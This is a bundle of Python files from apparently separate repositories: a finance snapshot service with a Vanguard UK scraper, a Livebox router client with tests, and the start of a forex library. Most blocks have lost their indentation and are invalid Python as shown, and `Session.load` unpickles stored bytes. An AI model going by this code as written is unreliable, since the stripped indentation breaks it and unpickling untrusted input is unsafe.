def balance_has_priority(data):
if data["line_item"] == "balances":
return 0
return 1
def iter_errors(account_data):
if "error" in account_data:
yield {"scope": "linked_account", "error": account_data["error"]}
return
for data_entry in account_data["financial_data"]:
if "error" in data_entry:
yield {
"scope": f"linked_account.{data_entry['line_item']}",
"error": data_entry["error"],
}
for account in raw_snapshot:
real_account = {"id": account["account_id"], "provider": account["provider"]}
account_errors = list(iter_errors(account["data"]))
visitor.visit_account(real_account, account_errors)
if account_errors:
continue
for entry in sorted(
account["data"]["financial_data"], key=balance_has_priority
):
line_item = entry["line_item"]
for result in entry["results"]:
sub_account = deepcopy(result["account"])
if line_item == "balances":
visitor.visit_sub_account(
real_account, sub_account, result["balance"]
)
elif line_item == "assets":
for asset in result["assets"]:
visitor.visit_item(
real_account,
sub_account,
SubAccountItemType.Asset,
deepcopy(asset),
)
elif line_item == "liabilities":
for liability in result["liabilities"]:
visitor.visit_item(
real_account,
sub_account,
SubAccountItemType.Liability,
deepcopy(liability),
)
class XccyCollector(SnapshotTreeVisitor):
def __init__(self, target_ccy):
self.target_ccy = target_ccy
self.xccys = set()
def visit_sub_account(self, account, sub_account, balance):
if sub_account["iso_currency"] != self.target_ccy:
self.xccys.add(
fx_market.Xccy(
domestic=sub_account["iso_currency"], foreign=self.target_ccy
)
)
class CachedXccyRatesGetter(object):
def __init__(self, xccy_rates):
self.xccy_rates = xccy_rates
def __call__(self, xccy: fx_market.Xccy):
if xccy.foreign == xccy.domestic:
return 1.0
return self.xccy_rates[xccy]
class SnapshotBuilderVisitor(SnapshotTreeVisitor):
def __init__(self, snapshot: UserAccountSnapshot, xccy_rates_getter, target_ccy):
self.snapshot = snapshot
self.xccy_rates_getter = xccy_rates_getter
self.target_ccy = target_ccy
self.linked_accounts: dict[
int, LinkedAccountSnapshotEntry
] = {} # linked_account_id -> account
self.sub_accounts: dict[
Tuple[str, str], SubAccountSnapshotEntry
] = {} # link_account_id, sub_account_id -> sub_account
self.results_count = SnapshotResultsCount(total=0, failures=0)
def visit_account(self, account, errors):
snapshot = self.snapshot
account_id = account["id"]
assert account_id not in self.linked_accounts
linked_account_entry = LinkedAccountSnapshotEntry(linked_account_id=account_id)
linked_account_entry.success = not bool(errors)
self.results_count.total += 1
if errors:
self.results_count.failures += 1
linked_account_entry.failure_details = errors
snapshot.linked_accounts_entries.append(linked_account_entry)
self.linked_accounts[account_id] = linked_account_entry
def visit_sub_account(self, account, sub_account, balance):
account_id = account["id"]
linked_account = self.linked_accounts[account_id]
sub_account_id = sub_account["id"]
assert sub_account_id not in self.sub_accounts
sub_account_entry = SubAccountSnapshotEntry(
sub_account_id=sub_account_id,
sub_account_ccy=sub_account["iso_currency"],
sub_account_description=sub_account["name"],
sub_account_type=sub_account["type"],
)
linked_account.sub_accounts_entries.append(sub_account_entry)
self.sub_accounts[(account_id, sub_account_id)] = sub_account_entry
def visit_item(self, account, sub_account, item_type, item):
linked_account_id = account["id"]
sub_account_id = sub_account["id"]
sub_account_entry = self.sub_accounts[(linked_account_id, sub_account_id)]
item_value = item["value"]
new_item = SubAccountItemSnapshotEntry(
item_type=item_type,
name=item["name"],
item_subtype=item["type"],
units=item.get("units"),
value_sub_account_ccy=item_value,
value_snapshot_ccy=item_value
* self.xccy_rates_getter(
fx_market.Xccy(
domestic=sub_account["iso_currency"], foreign=self.target_ccy
)
),
)
sub_account_entry.items_entries.append(new_item)
@dataclass
class AccountSnapshotRequest:
account_id: int
provider_id: str
credentials_data: dict[Any, Any]
line_items: list[LineItem]
account_metadata: Optional[str] = None
tracer_context: Optional[tracer.FlatContext] = None
def dispatch_snapshot_entry(snap_request: AccountSnapshotRequest):
try:
logging.info(
f"starting snapshot for account_id={snap_request.account_id}'"
f" provider_id={snap_request.provider_id}"
)
finbot_client = FinbotClient(FINBOT_ENV.finbotwsrv_endpoint)
account_snapshot = finbot_client.get_financial_data(
provider=snap_request.provider_id,
credentials_data=snap_request.credentials_data,
line_items=snap_request.line_items,
account_metadata=snap_request.account_metadata,
tracer_context=snap_request.tracer_context,
)
logging.info(
f"snapshot complete for for account_id={snap_request.account_id}'"
f" provider_id={snap_request.provider_id}"
)
return snap_request, account_snapshot
except Exception as e:
trace = format_stack(e)
logging.warning(
f"fatal error while taking snapshot for account_id={snap_request.account_id}"
f" provider_id={snap_request.provider_id}"
f" error: {e}"
f" trace:\n{trace}"
)
return snap_request, ApplicationErrorData.from_exception(e)
def get_credentials_data(linked_account: LinkedAccount, user_account: UserAccount):
assert linked_account.encrypted_credentials is not None
credentials = json.loads(
secure.fernet_decrypt(
linked_account.encrypted_credentials.encode(),
FINBOT_ENV.secret_key.encode(),
).decode()
)
if linked_account.provider_id == "plaid_us":
return pack_plaid_credentials(credentials, user_account.plaid_settings)
return credentials
def take_raw_snapshot(user_account: UserAccount, linked_accounts: Optional[list[int]]):
with ThreadPoolExecutor(max_workers=4) as executor:
logging.info("initializing accounts snapshot requests")
requests = [
AccountSnapshotRequest(
account_id=linked_account.id,
provider_id=linked_account.provider_id,
credentials_data=get_credentials_data(linked_account, user_account),
line_items=[LineItem.Balances, LineItem.Assets, LineItem.Liabilities],
account_metadata=f"{linked_account.account_name} (id: {linked_account.id})",
tracer_context=tracer.propagate(),
)
for linked_account in user_account.linked_accounts
if not linked_account.deleted
and not linked_account.frozen
and (not linked_accounts or linked_account.id in linked_accounts)
]
logging.info(f"starting snapshot with {len(requests)} request(s)")
snapshot_entries = executor.map(dispatch_snapshot_entry, requests)
logging.info("complete snapshot taken")
return [
{
"provider": snap_request.provider_id,
"account_id": snap_request.account_id,
"data": account_snapshot,
}
for snap_request, account_snapshot in snapshot_entries
]
def validate_fx_rates(rates: dict[fx_market.Xccy, Optional[float]]):
missing_rates = [str(pair) for (pair, rate) in rates.items() if rate is None]
if missing_rates:
raise RuntimeError(
f"rate is missing for the following FX pair(s): {', '.join(missing_rates)}"
)
def take_snapshot_impl(
user_account_id: int, linked_accounts: Optional[list[int]]
) -> SnapshotSummary:
logging.info(
f"fetching user information for"
f" user_account_id={user_account_id}"
f" linked_accounts={linked_accounts}"
)
tracer.current().set_input(
{"user_account_id": user_account_id, "linked_accounts": linked_accounts}
)
user_account = (
db_session.query(UserAccount)
.options(joinedload(UserAccount.linked_accounts))
.options(joinedload(UserAccount.settings))
.options(joinedload(UserAccount.plaid_settings))
.filter_by(id=user_account_id)
.first()
)
logging.info(
f"starting snapshot for user account "
f"linked to {len(user_account.linked_accounts)} external accounts"
)
requested_ccy = user_account.settings.valuation_ccy
logging.info(f"requested valuation currency is {requested_ccy}")
with db_session.persist(UserAccountSnapshot()) as new_snapshot:
new_snapshot.status = SnapshotStatus.Processing
new_snapshot.requested_ccy = requested_ccy
new_snapshot.user_account_id = user_account_id
new_snapshot.start_time = utils.now_utc()
new_snapshot.trace_guid = tracer.context_identifier()
tracer.milestone("blank snapshot created", output={"id": new_snapshot.id})
with tracer.sub_step("raw snapshot") as step:
raw_snapshot = take_raw_snapshot(
user_account=user_account, linked_accounts=linked_accounts
)
logging.debug(pretty_dump(raw_snapshot))
step.set_output(raw_snapshot)
with tracer.sub_step("fetch currency pairs") as step:
xccy_collector = XccyCollector(requested_ccy)
visit_snapshot_tree(raw_snapshot, xccy_collector)
step.set_input(xccy_collector.xccys)
xccy_rates = fx_market.get_rates(xccy_collector.xccys)
step.set_output(xccy_rates)
logging.info("adding cross currency rates to snapshot")
with db_session.persist(new_snapshot):
new_snapshot.xccy_rates_entries.extend(
[
XccyRateSnapshotEntry(
xccy_pair=str(xccy), rate=Decimal(unwrap_optional(rate))
)
for xccy, rate in xccy_rates.items()
]
)
logging.info("building final snapshot")
snapshot_builder = SnapshotBuilderVisitor(
new_snapshot, CachedXccyRatesGetter(xccy_rates), new_snapshot.requested_ccy
)
with db_session.persist(new_snapshot):
visit_snapshot_tree(raw_snapshot, snapshot_builder)
new_snapshot.status = SnapshotStatus.Success
new_snapshot.end_time = utils.now_utc()
return SnapshotSummary(
identifier=new_snapshot.id,
start_time=new_snapshot.start_time,
end_time=new_snapshot.end_time,
results_count=snapshot_builder.results_count,
)
@app.route("/healthy", methods=["GET"])
@service_endpoint()
def healthy():
return {"healthy": True}
@app.route("/snapshot/<user_account_id>/take", methods=["POST"])
@service_endpoint()
@validate()
def take_snapshot(user_account_id: int, body: TakeSnapshotRequest):
return TakeSnapshotResponse(
snapshot=take_snapshot_impl(
user_account_id=user_account_id, linked_accounts=body.linked_accounts
)
)
```
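The service is plain HTTP behind Flask, so a snapshot can be triggered with `requests`; a sketch (host, port and account id are assumptions):
```python
import requests

resp = requests.post(
    "http://localhost:5000/snapshot/1/take",  # assumed snapwsrv host/port
    json={"linked_accounts": None},           # None = snapshot every linked account
)
resp.raise_for_status()
print(resp.json())  # contains the SnapshotSummary for the new snapshot
```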
#### File: finbot/core/utils.py
```python
import stackprinter
from typing import TypeVar, Optional, Any, Callable, Type, Iterator
from pytz import timezone
from datetime import datetime
from dataclasses import dataclass, field, asdict
from contextlib import contextmanager
import functools
def now_utc() -> datetime:
return datetime.now(timezone("UTC"))
def swallow_exc(
*exc_types: Type[BaseException], default: Optional[Any] = None
) -> Callable[..., Any]:
def decorator(func: Callable[..., Any]) -> Callable[..., Any]:
@functools.wraps(func)
def impl(*args: Any, **kwargs: Any) -> Any:
try:
return func(*args, **kwargs)
except exc_types:
return default
return impl
return decorator
def fully_qualified_type_name(obj: Any) -> str:
t = type(obj)
return f"{t.__module__}.{t.__qualname__}"
T = TypeVar("T")
def unwrap_optional(val: Optional[T]) -> T:
assert val is not None
return val
@dataclass
class StackPrinterSettings:
show_vals: Optional[str] = field(default_factory=lambda: "all")
style: str = field(default_factory=lambda: "plaintext")
def as_kwargs(self) -> dict[str, Any]:
return asdict(self)
def clone(self) -> "StackPrinterSettings":
return StackPrinterSettings(**asdict(self))
STACK_PRINTER_SETTINGS = StackPrinterSettings()
def configure_stack_printer(**kwargs: Any) -> None:
global STACK_PRINTER_SETTINGS
STACK_PRINTER_SETTINGS = StackPrinterSettings(**kwargs)
def _get_stack_printer_settings() -> StackPrinterSettings:
global STACK_PRINTER_SETTINGS
return STACK_PRINTER_SETTINGS
@contextmanager
def scoped_stack_printer_configuration(**kwargs: Any) -> Iterator[None]:
old_settings = _get_stack_printer_settings().clone()
try:
configure_stack_printer(**kwargs)
yield
finally:
configure_stack_printer(**old_settings.as_kwargs())
def format_stack(thing: Optional[Exception] = None, **kwargs: Any) -> str:
sp_settings = _get_stack_printer_settings()
output: str = stackprinter.format(thing, **{**sp_settings.as_kwargs(), **kwargs})
return output
```
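`swallow_exc` turns selected exceptions into a default return value, which keeps caller code free of repetitive try/except blocks; a small example:
```python
@swallow_exc(ValueError, default=0.0)
def parse_ratio(text: str) -> float:
    return float(text)

assert parse_ratio("0.5") == 0.5
assert parse_ratio("n/a") == 0.0  # ValueError swallowed, default returned
```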
#### File: finbot/providers/vanguard_uk.py
```python
from finbot.providers.selenium_based import SeleniumBased
from finbot.providers.support.selenium import SeleniumHelper
from finbot.providers.errors import AuthenticationFailure
from finbot import providers
from finbot.core.utils import swallow_exc
from selenium.webdriver.common.by import By
from selenium.common.exceptions import StaleElementReferenceException
from selenium.webdriver.remote.webelement import WebElement
from price_parser import Price # type: ignore
from typing import Any, Optional, Iterator
from datetime import datetime, timedelta
from copy import deepcopy
import contextlib
import json
import uuid
BASE_URL = "https://secure.vanguardinvestor.co.uk"
class Credentials(object):
def __init__(self, username: str, password: str) -> None:
self.username = username
self.password = password
@property
def user_id(self) -> str:
return self.username
@staticmethod
def init(data: dict[Any, Any]) -> "Credentials":
return Credentials(data["username"], data["password"])
class Api(SeleniumBased):
def __init__(self) -> None:
super().__init__()
self.home_url: Optional[str] = None
self.account_data: Optional[list[dict[str, Any]]] = None
def _go_home(self) -> None:
assert self.home_url is not None
if self.browser.current_url == self.home_url:
return
self._do.get(self.home_url)
def authenticate(self, credentials: Credentials) -> None:
def extract_accounts(context_data: dict[str, Any]) -> list[dict[str, Any]]:
accounts = []
for account in context_data["Accounts"]:
for entry in account["SubAccounts"]:
accounts.append(
{
"description": {
"id": entry["SubAccountId"].strip(),
"name": entry["PreferredName"].strip(),
"iso_currency": "GBP",
"type": "investment",
},
"home_url": entry["HomepageUrl"],
}
)
return accounts
browser = self.browser
browser.get(f"{BASE_URL}/Login")
auth_form = self._do.wait_element(By.CSS_SELECTOR, "form.form-login")
user_input, password_input, *_ = auth_form.find_elements(By.TAG_NAME, "input")
user_input.send_keys(credentials.username)
password_input.send_keys(credentials.password)
auth_form.find_element(By.CSS_SELECTOR, "div.submit button").click()
self._do.assert_success(
_is_logged_in, lambda _: _get_login_error(auth_form), _report_auth_error
)
self.home_url = self.browser.current_url
self.account_data = extract_accounts(
json.loads(
self._do.find(By.XPATH, "//*[@data-available-context]").get_attribute(
"data-available-context"
)
)
)
def _get_account_balance(self, account: dict[str, Any]) -> providers.BalanceEntry:
dashboard_url = f"{BASE_URL}{account['home_url']}/Dashboard"
self._do.get(dashboard_url)
value_cell = self._do.wait_element(
By.CSS_SELECTOR, "section.portfolio-header div.col-value div.value"
)
account_description: providers.Account = deepcopy(account["description"])
account_balance = Price.fromstring(value_cell.text.strip()).amount_float
assert account_balance is not None
return {
"account": account_description,
"balance": account_balance,
}
def get_balances(self) -> providers.Balances:
assert self.account_data is not None
return {
"accounts": [
self._get_account_balance(account) for account in self.account_data
]
}
def _get_account_assets(self, account: dict[str, Any]) -> providers.AssetEntry:
assets_url = f"{BASE_URL}{account['home_url']}/Investments/Holdings"
self._do.get(assets_url)
self._do.wait_element(
By.CSS_SELECTOR, "div.toggle-switch span.label-one"
).click()
investments_table = self._do.wait_element(
By.CSS_SELECTOR, "table.table-investments-detailed"
)
all_assets: list[providers.Asset] = []
for section in investments_table.find_elements(
By.CSS_SELECTOR, "tbody.group-content"
):
group_row = section.find_element(By.CSS_SELECTOR, "tr.group-row")
product_type = group_row.text.strip().split()[0].lower()
product_rows = _get_product_rows(section, timedelta(seconds=60))
for product_row in product_rows:
all_assets.append(_extract_asset(product_type, product_row))
account_description: providers.Account = deepcopy(account["description"])
return {"account": account_description, "assets": all_assets}
def get_assets(self) -> providers.Assets:
assert self.account_data is not None
return {
"accounts": [
self._get_account_assets(account) for account in self.account_data
]
}
class _StalenessDetector(object):
def __init__(self, browser_helper: SeleniumHelper):
self._browser_helper = browser_helper
self._marker = str(uuid.uuid4())
def mark_visited(self, element: WebElement) -> None:
self._browser_helper.execute_script(
f"arguments[0].innerHTML = '{self._marker}'", element
)
def wait_refreshed(self, element: WebElement) -> None:
self._browser_helper.wait_cond(lambda _: element.text.strip() != self._marker)
@contextlib.contextmanager
def visit(self, element: WebElement) -> Iterator[None]:
self.wait_refreshed(element)
yield
self.mark_visited(element)
def _get_product_rows(section: WebElement, timeout: timedelta) -> list[WebElement]:
cutoff = datetime.now() + timeout
while datetime.now() < cutoff:
product_rows: list[WebElement] = section.find_elements(
By.CSS_SELECTOR, "tr.product-row"
)
if len(product_rows) > 0:
return product_rows
raise RuntimeError("could not find product rows in section")
def _extract_cash_asset(product_row: WebElement) -> providers.Asset:
amount_str = product_row.find_elements(By.TAG_NAME, "td")[5].text.strip()
amount = Price.fromstring(amount_str).amount_float
assert amount is not None
return {
"name": "Cash",
"type": "currency",
"value": amount,
}
def _extract_fund_asset(product_type: str, product_row: WebElement) -> providers.Asset:
cells = product_row.find_elements(By.TAG_NAME, "td")
name_cell = cells[0].find_element(By.CSS_SELECTOR, "p.content-product-name")
product_name = name_cell.text.strip()
ongoing_charges = float(cells[1].text.strip()[:-1]) / 100.0
units = float(cells[2].text.strip())
avg_unit_cost = Price.fromstring(cells[3].text.strip()).amount_float
last_price = Price.fromstring(cells[4].text.strip()).amount_float
total_cost = Price.fromstring(cells[5].text.strip()).amount_float
value = Price.fromstring(cells[6].text.strip()).amount_float
assert value is not None
return {
"name": product_name,
"type": f"{product_type} fund",
"value": value,
"units": units,
"provider_specific": {
"Ongoing charges": ongoing_charges,
"Last price": last_price,
"Total cost": total_cost,
"Average unit cost": avg_unit_cost,
},
}
def _extract_asset(product_type: str, product_row: WebElement) -> providers.Asset:
if product_type == "cash":
return _extract_cash_asset(product_row)
return _extract_fund_asset(product_type, product_row)
@swallow_exc(StaleElementReferenceException)
def _get_login_error(auth_form: WebElement) -> Optional[str]:
error_area: list[WebElement] = auth_form.find_elements(
By.CLASS_NAME, "error-message"
)
if error_area and error_area[0].is_displayed():
login_error: str = error_area[0].text.strip()
return login_error
return None
def _report_auth_error(error_message: str) -> None:
raise AuthenticationFailure(error_message.replace("\n", " ").strip())
def _is_logged_in(do: SeleniumHelper) -> bool:
return do.find_maybe(By.CSS_SELECTOR, "section.portfolio-header") is not None
```
#### File: migrations/versions/418d0d0013a2_distributed_trace.py
```python
from finbot.core.db.types import JSONEncoded
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '418d0d0013a2'
down_revision = '2a508081682f'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('finbot_distributed_traces',
sa.Column('guid', sa.String(length=36), nullable=False),
sa.Column('path', sa.String(length=64), nullable=False),
sa.Column('name', sa.String(length=64), nullable=False),
sa.Column('user_data', JSONEncoded(), nullable=True),
sa.Column('start_time', sa.DateTime(timezone=True), nullable=True),
sa.Column('end_time', sa.DateTime(timezone=True), nullable=True),
sa.Column('created_at', sa.DateTime(timezone=True), server_default=sa.text('now()'), nullable=True),
sa.Column('updated_at', sa.DateTime(timezone=True), nullable=True),
sa.PrimaryKeyConstraint('guid', 'path', 'name')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('finbot_distributed_traces')
# ### end Alembic commands ###
```
#### File: system/finbotwsrv/test_smoke.py
```python
from finbot.core.environment import get_finbotwsrv_endpoint
from finbot.clients.finbot import FinbotClient, LineItem
import pytest
@pytest.fixture
def api() -> FinbotClient:
return FinbotClient(get_finbotwsrv_endpoint())
def test_healthy(api: FinbotClient):
assert api.healthy
def check_account(data):
assert data["id"] == "dummy"
assert data["iso_currency"] == "GBP"
assert data["type"] == "cash"
def check_assets_financial_data(results):
assert len(results) == 1
data = results[0]
check_account(data["account"])
assets = data["assets"]
assert len(assets) == 1
asset = assets[0]
assert asset["name"] == "Cash"
assert asset["type"] == "currency"
assert asset["value"] == 1000.0
def check_balances_financial_data(results):
assert len(results) == 1
data = results[0]
check_account(data["account"])
assert data["balance"] == 1000.0
def test_get_financial_data(api: FinbotClient):
response = api.get_financial_data(
provider="dummy_uk",
credentials_data={},
line_items=[
LineItem.Assets,
LineItem.Balances,
],
)
assert "financial_data" in response
financial_data = response["financial_data"]
print(financial_data)
assert len(financial_data) == 2
for entry in financial_data:
line_item = entry["line_item"]
if line_item == "assets":
check_assets_financial_data(entry["results"])
elif line_item == "balances":
check_balances_financial_data(entry["results"])
else:
assert False, f"Unexpected line item: {line_item}"
```
#### File: system/histwsrv/test_smoke.py
```python
from finbot.core.environment import get_histwsrv_endpoint
from finbot.clients import HistoryClient
import pytest
@pytest.fixture
def api() -> HistoryClient:
return HistoryClient(get_histwsrv_endpoint())
def test_healthy(api: HistoryClient):
assert api.healthy
```
|
{
"source": "jean-edouard-boulanger/mylivebox",
"score": 2
}
|
#### File: mylivebox/mylivebox/client.py
```python
from .entities import (
DeviceInfo,
DynDnsHost,
VoipConfig,
NmcStatus,
WanStatus,
WifiStatus,
WifiStats,
IPTVConfig,
User,
)
from dateutil.parser import parse as parse_date
from typing import Union, Protocol, List, Optional, Dict
from datetime import datetime
import requests
import json
import logging
import socket
import pickle
logger = logging.getLogger("mylivebox")
def _resolve_livebox_url() -> str:
return 'http://' + socket.gethostbyname("livebox")
class ClientError(RuntimeError):
pass
class SessionError(ClientError):
pass
class BasicCredentials(object):
def __init__(self, username: str, password: str):
self.username = username
self.password = password
class SessionBase(Protocol):
def send_request(self,
endpoint: str,
method: Optional[str] = None,
depth: Optional[int] = None,
parameters: Optional[Dict] = None):
pass
def save(self) -> bytes:
pass
class Session(SessionBase):
def __init__(self,
http_session: requests.Session,
base_url: str,
context_id: str):
self._http_session = http_session
self._base_url = base_url
self._context_id = context_id
@property
def context_id(self) -> str:
return self._context_id
def send_request(self,
endpoint: str,
method: Optional[str] = None,
depth: Optional[int] = None,
parameters: Optional[Dict] = None):
uri = f"{self._base_url}/sysbus/{endpoint.replace('.', '/')}"
if method is not None:
uri = f"{uri}:{method}"
if depth is not None:
uri = f"{uri}?_restDepth={depth}"
response = self._http_session.post(
uri,
headers={
"X-Context": self._context_id,
"X-Prototype-Version": "1.7",
"Content-Type": "application/x-sah-ws-1-call+json; charset=UTF-8",
"Accept": "text/javascript"
},
data=json.dumps({
"parameters": parameters or {}
})
)
logger.debug(response.json())
result = response.json()["result"]
if "error" in result or "errors" in result:
raise SessionError(f"'{endpoint}' request failed: {result}")
return result
def save(self) -> bytes:
binary_data = pickle.dumps({
"http_session": self._http_session,
"base_url": self._base_url,
"context_id": self._context_id
})
return binary_data
@staticmethod
def load(stream: bytes) -> 'Session':
data = pickle.loads(stream)
return Session(data["http_session"], data["base_url"], data["context_id"])
@staticmethod
def create(username, password, base_url) -> 'Session':
session = requests.Session()
auth_response = session.post(
f"{base_url}/ws",
data=json.dumps({
"service": "sah.Device.Information",
"method": "createContext",
"parameters": {
"applicationName": "so_sdkut",
"username": username,
"password": password
}
}),
headers={
'Content-Type': 'application/x-sah-ws-1-call+json',
'Authorization': 'X-Sah-Login'
}
)
context_id = auth_response.json()["data"]["contextID"]
return Session(session, base_url, context_id)
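# Type alias used as a return annotation for methods that are invoked purely for their side effects.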
SideEffect = None
class Livebox(object):
def __init__(self,
session_source: Union[SessionBase, BasicCredentials],
                 base_url: Optional[str] = None):
if isinstance(session_source, Session):
self._session = session_source
elif isinstance(session_source, BasicCredentials):
base_url = base_url or _resolve_livebox_url()
self._session = Session.create(
session_source.username,
session_source.password,
base_url)
else:
raise ClientError("Invalid input: only support Session or Credentials")
@property
def session(self) -> Session:
return self._session
def reboot(self) -> SideEffect:
self._session.send_request("NMC", "reboot")
@property
def language(self) -> str:
response = self._session.send_request("UserInterface", "getLanguage")
return response["status"]
@property
def available_languages(self) -> List[str]:
response = self._session.send_request("UserInterface", "getLanguage")
return response["data"]["availableLanguages"]
@language.setter
def language(self, new_value: str) -> SideEffect:
self._session.send_request(
"UserInterface", "setLanguage",
parameters={"currentLanguage": new_value}
)
def ring_phone(self) -> SideEffect:
self._session.send_request("VoiceService.VoiceApplication", "ring")
@property
def users(self) -> List[User]:
response = self._session.send_request("UserManagement", "getUsers")
return [User.deserialize(item) for item in response["status"]]
@property
def usb_devices(self) -> List[Dict]:
response = self._session.send_request("USBHosts", "getDevices")
return response["status"]
@property
def devices(self) -> List[Dict]:
response = self._session.send_request("Devices", "get")
return response["status"]
@property
def device_info(self) -> DeviceInfo:
response = self._session.send_request("DeviceInfo", "get")
return DeviceInfo.deserialize(response["status"])
@property
def system_time(self) -> datetime:
response = self._session.send_request("Time", "getTime")
return parse_date(response["data"]["time"])
@property
def utc_time(self) -> datetime:
response = self._session.send_request("Time", "getUTCTime")
return parse_date(response["data"]["time"])
@property
    def time_synchronized(self) -> bool:
response = self._session.send_request("Time", "getStatus")
return response["data"]["status"] == "Synchronized"
@property
def ntp_servers(self) -> List[str]:
response = self._session.send_request("Time", "getNTPServers")
return [
s for s in response["data"]["servers"].values()
if len(s) > 0
]
@property
def local_timezone(self) -> str:
response = self._session.send_request("Time", "getLocalTimeZoneName")
return response["data"]["timezone"]
@local_timezone.setter
def local_timezone(self, timezone: str) -> SideEffect:
self._session.send_request(
"Time", "setLocalTimeZoneName",
parameters={
"timezone": timezone
})
@property
def local_timezone_names(self) -> List[str]:
response = self._session.send_request("Time", "listLocalTimeZoneNames")
return response["data"]["timezones"]
@property
def pnp_status(self) -> List[str]:
response = self._session.send_request("PnP", "get")
return response["status"]
@property
def dyndns_services(self) -> List[str]:
response = self._session.send_request("DynDNS", "getServices")
return response["status"]
@property
def dyndns_hosts(self) -> List[DynDnsHost]:
response = self._session.send_request("DynDNS", "getHosts")
return [DynDnsHost.deserialize(item) for item in response["status"]]
def add_dyndns_host(self,
service: str,
hostname: str,
username: str,
password: str) -> SideEffect:
self._session.send_request(
"DynDNS", "addHost",
parameters={
"service": service,
"hostname": hostname,
"username": username,
"password": password
}
)
def remove_dyndns_host(self, hostname: str) -> SideEffect:
self._session.send_request(
"DynDNS", "delHost",
parameters={
"hostname": hostname
}
)
@property
def nmc_status(self) -> NmcStatus:
response = self._session.send_request("NMC", "get")
return NmcStatus.deserialize(response["status"])
@property
def wan_status(self) -> WanStatus:
response = self._session.send_request("NMC", "getWANStatus")
return WanStatus.deserialize(response["data"])
@property
def wifi_status(self) -> WifiStatus:
response = self._session.send_request("NMC.Wifi", "get")
return WifiStatus.deserialize(response["status"])
@property
def wifi_enabled(self) -> bool:
return self.wifi_status.enable
@wifi_enabled.setter
def wifi_enabled(self, enabled: bool) -> SideEffect:
assert isinstance(enabled, bool)
self._session.send_request(
"NMC.Wifi", "set",
parameters={"Enable": enabled}
)
@property
def wifi_password_displayed(self) -> bool:
response = self._session.send_request("Screen", "getShowWifiPassword")
return response["status"]
@wifi_password_displayed.setter
def wifi_password_displayed(self, enabled: bool):
assert isinstance(enabled, bool)
self._session.send_request(
"Screen", "setShowWifiPassword",
parameters={"Enable": enabled}
)
@property
def wifi_stats(self) -> WifiStats:
response = self._session.send_request("NMC.Wifi", "getStats")
return WifiStats.deserialize(response["data"])
@property
def voip_config(self) -> List[VoipConfig]:
response = self._session.send_request("NMC", "getVoIPConfig")
return [VoipConfig.deserialize(item) for item in response["status"]]
@property
def iptv_status(self) -> str:
response = self._session.send_request("NMC.OrangeTV", "getIPTVStatus")
return response["data"]["IPTVStatus"]
@property
def iptv_config(self) -> List[IPTVConfig]:
response = self._session.send_request("NMC.OrangeTV", "getIPTVConfig")
return [IPTVConfig.deserialize(item) for item in response["status"]]
@property
def iptv_multi_screens(self) -> bool:
response = self._session.send_request("NMC.OrangeTV", "getIPTVMultiScreens")
return response["data"]["Enable"]
@property
def firewall_level(self) -> str:
response = self._session.send_request("Firewall", "getFirewallLevel")
return response["status"]
```
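A minimal usage sketch for the client above. The credentials are placeholders, and when no `base_url` is given the constructor resolves the hostname `livebox` on the local network:
```python
from mylivebox.client import BasicCredentials, Livebox  # import path assumed from this file's location

# Authenticate against the router and read a few properties.
box = Livebox(BasicCredentials("admin", "changeme"))  # placeholder credentials
print(box.device_info.model_name)
print(box.wifi_enabled)

# Properties with setters issue the corresponding write request.
box.wifi_enabled = False
```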
#### File: mylivebox/tests/test_entities.py
```python
from mylivebox.entities import DeviceInfo
def test_deserialize_device_info():
data = {
"Manufacturer": "Sagemcom",
"ManufacturerOUI": "44A61E",
"ModelName": "SagemcomFast3965_LB2.8",
"Description": "SagemcomFast3965_LB2.8 Sagemcom fr",
"ProductClass": "Livebox 3",
"SerialNumber": "AN2022410620365",
"HardwareVersion": "SG_LB3_1.2.1",
"SoftwareVersion": "SG30_sip-fr-6.62.12.1",
"RescueVersion": "SG30_sip-fr-6.52.18.1",
"ModemFirmwareVersion": "",
"EnabledOptions": "",
"AdditionalHardwareVersion": "",
"AdditionalSoftwareVersion": "g6-f-sip-fr",
"SpecVersion": "1.1",
"ProvisioningCode": "HASH.3222.2827",
"UpTime": 429086,
"FirstUseDate": "0001-01-01T00:00:00Z",
"DeviceLog": "",
"VendorConfigFileNumberOfEntries": 1,
"ManufacturerURL": "http://www.sagemcom.com/",
"Country": "fr",
"ExternalIPAddress": "1.2.3.4",
"DeviceStatus": "Up",
"NumberOfReboots": 7,
"UpgradeOccurred": False,
"ResetOccurred": False,
"RestoreOccurred": False
}
device_info = DeviceInfo.deserialize(data)
assert device_info.manufacturer == "Sagemcom"
assert device_info.manufacturer_oui == "44A61E"
assert device_info.model_name == "SagemcomFast3965_LB2.8"
assert device_info.description == "SagemcomFast3965_LB2.8 Sagemcom fr"
assert device_info.product_class == "Livebox 3"
assert device_info.serial_number == "AN2022410620365"
assert device_info.hardware_version == "SG_LB3_1.2.1"
assert device_info.software_version == "SG30_sip-fr-6.62.12.1"
assert device_info.rescue_version == "SG30_sip-fr-6.52.18.1"
assert device_info.modem_firmware_version == ""
assert device_info.enabled_options == ""
assert device_info.additional_hardware_version == ""
assert device_info.additional_software_version == "g6-f-sip-fr"
assert device_info.spec_version == "1.1"
assert device_info.provisioning_code == "HASH.3222.2827"
assert device_info.uptime == 429086
assert device_info.first_use_date == "0001-01-01T00:00:00Z"
assert device_info.device_log == ""
assert device_info.vendor_config_file_number_of_retries == 1
assert device_info.manufacturer_url == "http://www.sagemcom.com/"
assert device_info.country == "fr"
assert device_info.external_ip_address == "1.2.3.4"
assert device_info.device_status == "Up"
assert device_info.number_of_reboots == 7
assert device_info.upgrade_occurred is False
assert device_info.reset_occurred is False
assert device_info.restore_occurred is False
```
|
{
"source": "jean-edouard-boulanger/python-quickforex",
"score": 2
}
|
#### File: python-quickforex/quickforex/api.py
```python
from typing import Iterable, Union, Optional, Any, Type
from datetime import date
from decimal import Decimal
from quickforex.providers.base import ProviderBase
from quickforex.providers.exchangerate_host import ExchangeRateHostProvider
from quickforex.providers.provider_metadata import ProviderMetadata
from quickforex.providers import factory as providers_factory
from quickforex.domain import CurrencyPairType, CurrencyPair, DateRange
from quickforex.utils import (
parse_currency_pairs_args,
parse_currency_pair_args,
parse_date_range_kwargs,
)
_DEFAULT_PROVIDER: Type[ProviderBase] = ExchangeRateHostProvider
_INSTALLED_PROVIDER: ProviderBase = _DEFAULT_PROVIDER()
def _provider() -> ProviderBase:
return _INSTALLED_PROVIDER
